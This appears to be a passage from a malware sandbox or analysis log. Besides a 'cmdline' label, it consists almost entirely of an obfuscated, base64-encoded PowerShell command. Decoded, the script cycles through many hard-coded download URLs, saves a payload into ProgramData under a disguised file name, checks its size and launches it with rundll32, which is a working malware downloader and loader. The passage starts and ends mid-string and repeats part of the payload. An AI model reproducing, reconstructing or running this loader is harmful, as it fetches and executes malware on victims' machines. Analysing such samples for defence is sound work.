QBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGEAUQBCAHkAQQBIAFUAQQBiAGcAQgBrAEEARwA4AEEAUQB3AEIAdgBBAEcAOABBAGMAQQBCAGwAQQBIAEkAQQBlAFEAQQB1AEEARwA0AEEAWQBRAEIAbgBBAEcAOABBAGUAUQBCAGgAQQBBAD0APQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYATQBBAGQAUQBCAHcAQQBHAFUAQQBjAGcAQgBwAEEARwA0AEEAWgBBAEIAcABBAEgAWQBBAGEAUQBCAGsAQQBIAFUAQQBZAFEAQgBzAEEAQwA0AEEAYgBBAEIAcABBAEcAMABBAGIAdwBBAD0AIgA7ACQAUAByAG8AbABpAGYAZQByAGEAdABpAHYAZQBQAGEAcgBmAGUAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBADMAQQBDADQAQQBOAEEAQQB4AEEAQwA0AEEATgBBAEEAMwBBAEMANABBAE0AUQBBADIAQQBEAEkAQQBBAGoAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBAHkAQQBDADQAQQBNAGcAQQB4AEEARABrAEEATABnAEEAeABBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQQA9AD0AQQBqAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE4AZwBBADUAQQBDADQAQQBOAGcAQQAwAEEAQQA9AD0AQQBqAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAG8AQQBIAFUAQQBjAHcAQgByAEEARwBrAEEAWgBRAEIAegBBAEUAVQBBAGUAUQBCAGwAQQBHAEkAQQBiAEEAQgBwAEEARwA0AEEAYQB3AEEAdQBBAEcAdwBBAGEAUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbgBvAG4AaQBuAHQAZQBsAGwAaQBnAGUAbgBjAGUALgBOAG8AbgBhAGMAaQBkACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAyADIANQAzADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHADQAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBaAHcAQgBsAEEARwA0AEEAWQB3AEIAbABBAEMANABBAFQAZwBCAHYAQQBHADQAQQBZAFEAQgBqAEEARwBrAEEAWgBBAEEAcwBBAEgAWQBBAGEAUQBCAHcAQQBIAE0AQQBPAHcAQgB6AEEARwB3AEEAWQBRAEIAagBBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA9ACIAOwAkAG8AdQB0AGYAaQB0AHQAZQByAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE4AQQBBADQAQQBDADQAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAYwBhAG0AZQByAGEAbABpAHMAdABpAGMASAB5AGQAcgBvAGMAeQBhAG4AaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAHcAQQB1AEEARABJAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBEAE0AQQBMAGcAQQA0AEEARABZAEEAIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABjAHUAbgBjAHQAYQB0AGkAbwBuAEYAdQByAHIAaQBuAGcAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAEkAQQBNAEEAQQA0AEEAQwA0AEEATQBRAEEAeABBAEQATQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9ACIAOwAkAE4AaQB0AHIAbwBwAGEAcgBhAGYAZgBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBZAFEAQgB6AEEASABRAEEAWgBRAEIAawBBAEMANABBAGIAUQBCAGgAQQBHADQAQQBZAFEAQgBuAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAD0AIgA7ACQAYQBuAHQAaQBjAGEAbgBjAGUAcgBvAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBADEAQQBDADQAQQBNAFEAQQA1AEEARABBAEEATABnAEEANQBBAEQARQBBAEwAZwBBADUAQQBEAFEAQQB2AEIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYgB3AEIAegBBAEcAMABBAGIAdwBCAHkAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAWgBRAEIAdQBBAEEAPQA9AHYAQgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAHcAQQBhAFEAQgBuAEEASABVAEEAYgBBAEIAaABBAEgASQBBAEwAZwBCAGgAQQBIAEkAQQBZAHcAQgBvAEEARwBrAEEAdgBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEcASQBBAGQAQQBCADEAQQBIAE0AQQBhAFEAQgBtAEEARwA4AEEAYgBBAEIAcABBAEcAOABBAGQAUQBCAHoAQQBDADQAQQBZAGcAQgBwAEEARwBzAEEAWgBRAEEAPQAiADsAfQB9ACQAbwB4AGYAbwByAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFEAQQBhAFEAQgB6AEEASABBAEEAWgBRAEIAdQBBAEgATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARwBFAEEAYgBBAEEAdQBBAEcASQBBAGQAUQBCAHoAQQBHAGsAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAHkAQQBIAFUAQQBiAFEAQgB3AEEARwBVAEEAZABBAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBlAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAdwBBAEEAPQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEASABVAEEAWQBRAEIAdQBBAEgAawBBAGIAQQBCAEMAQQBHAHcAQQBiAHcAQgB2AEEARwBRAEEAZQBRAEEAdQBBAEcAYwBBAGQAUQBCAHAAQQBHAFEAQQBaAFEAQQA9ACIAOwAkAGwAZQBlAHIAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAHcAQQB4AEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABjAEEATgBRAEEAPQBYAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AWABSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE0AUQBBAHUAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQA9ACIAOwA="

cmdline

powershell -encodedcommand "JABtAG8AYQBiAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABjAEEATABnAEEAMABBAEQATQBBAE8AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABJAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAGcAQQB5AEEARABFAEEATQBRAEEAPQAiADsAJABjAGgAbwBsAG8AaQBkAGkAbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAFEAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBNAFEAQQA0AEEAQQA9AD0AZQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAGcAQQBOAGcAQQA9AGUASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AUQBBAHoAQQBEAFUAQQBMAGcAQQA1AEEARABVAEEAZQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBRAEEANABBAEQARQBBAEwAZwBBADMAQQBEAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAxADsAJABwAGUAYwBrAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYwBnAEIAaABBAEgAYwBBAFkAZwBCAGwAQQBHADQAQQBZAHcAQgBvAEEARQBZAEEAYwBnAEIAaABBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBMAGcAQgB0AEEASABVAEEARgA9AE0ARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB5AEEARABNAEEATgBBAEEAPQBGAD0ATQBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQAyAEEARABBAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBNAHcAQQA1AEEAQQA9AD0AIgA7ACQAcgBvAG0AYQBuAGkAegBlAHIAQQBzAHAAcgBlAGQAaQBuAGkAZABhAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBHAHcAQQBaAFEAQgAxAEEASABJAEEAYgB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFkAQQBkAFEAQgBzAEEARwBNAEEAWQBRAEIAdQBBAEcAawBBAGMAdwBCAGwAQQBHAFEAQQBMAGcAQgB1AEEARwB3AEEAIgA7ACQASQBuAGMAbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAFkAdwBCADAAQQBIAFUAQQBiAHcAQgB6AEEARwBVAEEATABnAEIAbABBAEcARQBBAGMAZwBCADAAQQBHAGcAQQBzAEUAYgBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABnAEEATABnAEEANQBBAEQAZwBBAEwAZwBBADMAQQBEAEkAQQAiADsAJABoAGkAcABwAHUAcgBpAHMARQB4AGMAdQBzAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAUgBBAEIAMABBAEgATQBBAFYAQQBBADQAQQBIAGcAQQBkAEEAQQA9AGQAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATgB3AEEANQBBAEMAOABBAFUAQQBCAHMAQQBFAHcAQQBOAEEAQgB0AEEARgBVAEEATAB3AEEAdwBBAEUAMABBAFkAZwBBAHcAQQBGAGcAQQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAEUAQQBNAHcAQQB2AEEARQBZAEEAYwB3AEEANABBAEYAQQBBAGUAUQBBAHYAQQBGAEkAQQBaAFEAQgA1AEEARABBAEEAUgB3AEIAaABBAEYATQBBAFcAZwBBADIAQQBGAE0AQQBWAEEAQgB5AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAaABhAGsAYQBmAG8AdABoAEwAbwBwAHAAZQByACAAaQBuACAAJABoAGkAcABwAHUAcgBpAHMARQB4AGMAdQBzAGUAcgBzACAALQBzAHAAbABpAHQAIAAiAGQAIgApACAAewAkAFAAbABhAG4AbwByAGIAbwBpAGQAUwB0AHIAeQBwAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAegBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBBAEEAPQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAWQBBAEwAZwBBADQAQQBEAEEAQQBMAGcAQQB5AEEARABNAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBBAD0APQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAGMAQQBOAFEAQQB1AEEARABJAEEATQBnAEEAegBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAyAEEARABZAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBOAGcAQQA9ACIAOwB0AHIAeQAgAHsAJABpAG4AYwBhAHIAYwBlAHIAYQB0AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEANABBAEQARQBBAEwAZwBBAHgAQQBEAEUAQQBOAFEAQQA9AHQAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAdwBBAEQAUQBBAEwAZwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABRAEEATQBRAEEAPQAiADsAJABVAG4AZABpAHYAZQByAHQAaQBiAGwAeQBGAGkAYgByAG8AdgBhAHMAYwB1AGwAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBADQAQQBDADQAQQBNAFEAQQB5AEEARABFAEEATABnAEEAeABBAEQAawBBAE4AdwBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQATQBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQAVQBBAE8AQQBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgAWQBBAFoAUQBCAHkAQQBHAGsAQQBiAGcAQgB6AEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGoAQQBHAGsAQQBaAFEAQgB6AEEARQAwAEEAZABRAEIAeQBBAEgAQQBBAGEAQQBCADUAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHcAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAYwBBAEwAZwBBADAAQQBEAFUAQQAiADsAJABDAHIAYQBjAGsAdQBwACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYQBRAEIAagBBAEcAcwBBAFoAUQBCADAAQQBIAE0AQQBRAFEAQgBpAEEARwBJAEEAYgB3AEIANgBBAEgAbwBBAGIAdwBBAHUAQQBIAGsAQQBiAHcAQgBuAEEARwBFAEEAaABhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGQAUQBCAHoAQQBIAEEAQQBhAFEAQgBrAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCADUAQQBBAD0APQBoAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBvAEEASABrAEEAYwBBAEIAdgBBAEgAUQBBAGMAZwBCAHYAQQBIAEEAQQBhAEEAQgBwAEEARwBNAEEATABnAEIAbgBBAEgASQBBAGIAdwBCADEAQQBIAEEAQQAiADsAJABQAGkAZQByAGkAZABHAGUAbgB1AGYAbABlAHgAaQBvAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABhAGsAYQBmAG8AdABoAEwAbwBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAFAAaQBlAHIAaQBkAEcAZQBuAHUAZgBsAGUAeABpAG8AbgAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABuAG8AbgBpAG4AdABlAGwAbABpAGcAZQBuAGMAZQAuAE4AbwBuAGEAYwBpAGQAOwAkAEUAcwBjAG8AcABlAHQAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEcAVQBBAGIAQQBCAGgAQQBHADQAQQBiAHcAQgB3AEEARwB3AEEAWQBRAEIAcgBBAEcAawBBAFkAUQBCAEUAQQBHAGsAQQBjAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEcAYwBBAGMAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAYQBRAEIAegBBAEgAUQBBAEwAZwBCAGgAQQBHAGMAQQBaAFEAQgB1AEEARwBNAEEAZQBRAEEAPQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGEAUQBCAHkAQQBIAFUAQQBiAGcAQgBrAEEARwA4AEEAUQB3AEIAdgBBAEcAOABBAGMAQQBCAGwAQQBIAEkAQQBlAFEAQQB1AEEARwA0AEEAWQBRAEIAbgBBAEcAOABBAGUAUQBCAGgAQQBBAD0APQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYATQBBAGQAUQBCAHcAQQBHAFUAQQBjAGcAQgBwAEEARwA0AEEAWgBBAEIAcABBAEgAWQBBAGEAUQBCAGsAQQBIAFUAQQBZAFEAQgBzAEEAQwA0AEEAYgBBAEIAcABBAEcAMABBAGIAdwBBAD0AIgA7ACQAUAByAG8AbABpAGYAZQByAGEAdABpAHYAZQBQAGEAcgBmAGUAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBADMAQQBDADQAQQBOAEEAQQB4AEEAQwA0AEEATgBBAEEAMwBBAEMANABBAE0AUQBBADIAQQBEAEkAQQBBAGoAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBAHkAQQBDADQAQQBNAGcAQQB4AEEARABrAEEATABnAEEAeABBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQQA9AD0AQQBqAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE4AZwBBADUAQQBDADQAQQBOAGcAQQAwAEEAQQA9AD0AQQBqAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAG8AQQBIAFUAQQBjAHcAQgByAEEARwBrAEEAWgBRAEIAegBBAEUAVQBBAGUAUQBCAGwAQQBHAEkAQQBiAEEAQgBwAEEARwA0AEEAYQB3AEEAdQBBAEcAdwBBAGEAUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbgBvAG4AaQBuAHQAZQBsAGwAaQBnAGUAbgBjAGUALgBOAG8AbgBhAGMAaQBkACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAyADIANQAzADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHADQAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBaAHcAQgBsAEEARwA0AEEAWQB3AEIAbABBAEMANABBAFQAZwBCAHYAQQBHADQAQQBZAFEAQgBqAEEARwBrAEEAWgBBAEEAcwBBAEgAWQBBAGEAUQBCAHcAQQBIAE0AQQBPAHcAQgB6AEEARwB3AEEAWQBRAEIAagBBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA9ACIAOwAkAG8AdQB0AGYAaQB0AHQAZQByAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE4AQQBBADQAQQBDADQAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAYwBhAG0AZQByAGEAbABpAHMAdABpAGMASAB5AGQAcgBvAGMAeQBhAG4AaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAHcAQQB1AEEARABJAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBEAE0AQQBMAGcAQQA0AEEARABZAEEAIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABjAHUAbgBjAHQAYQB0AGkAbwBuAEYAdQByAHIAaQBuAGcAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAEkAQQBNAEEAQQA0AEEAQwA0AEEATQBRAEEAeABBAEQATQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9ACIAOwAkAE4AaQB0AHIAbwBwAGEAcgBhAGYAZgBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBZAFEAQgB6AEEASABRAEEAWgBRAEIAawBBAEMANABBAGIAUQBCAGgAQQBHADQAQQBZAFEAQgBuAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAD0AIgA7ACQAYQBuAHQAaQBjAGEAbgBjAGUAcgBvAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBADEAQQBDADQAQQBNAFEAQQA1AEEARABBAEEATABnAEEANQBBAEQARQBBAEwAZwBBADUAQQBEAFEAQQB2AEIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYgB3AEIAegBBAEcAMABBAGIAdwBCAHkAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAWgBRAEIAdQBBAEEAPQA9AHYAQgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAHcAQQBhAFEAQgBuAEEASABVAEEAYgBBAEIAaABBAEgASQBBAEwAZwBCAGgAQQBIAEkAQQBZAHcAQgBvAEEARwBrAEEAdgBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEcASQBBAGQAQQBCADEAQQBIAE0AQQBhAFEAQgBtAEEARwA4AEEAYgBBAEIAcABBAEcAOABBAGQAUQBCAHoAQQBDADQAQQBZAGcAQgBwAEEARwBzAEEAWgBRAEEAPQAiADsAfQB9ACQAbwB4AGYAbwByAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFEAQQBhAFEAQgB6AEEASABBAEEAWgBRAEIAdQBBAEgATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARwBFAEEAYgBBAEEAdQBBAEcASQBBAGQAUQBCAHoAQQBHAGsAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAHkAQQBIAFUAQQBiAFEAQgB3AEEARwBVAEEAZABBAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBlAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAdwBBAEEAPQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEASABVAEEAWQBRAEIAdQBBAEgAawBBAGIAQQBCAEMAQQBHAHcAQQBiAHcAQgB2AEEARwBRAEEAZQBRAEEAdQBBAEcAYwBBAGQAUQBC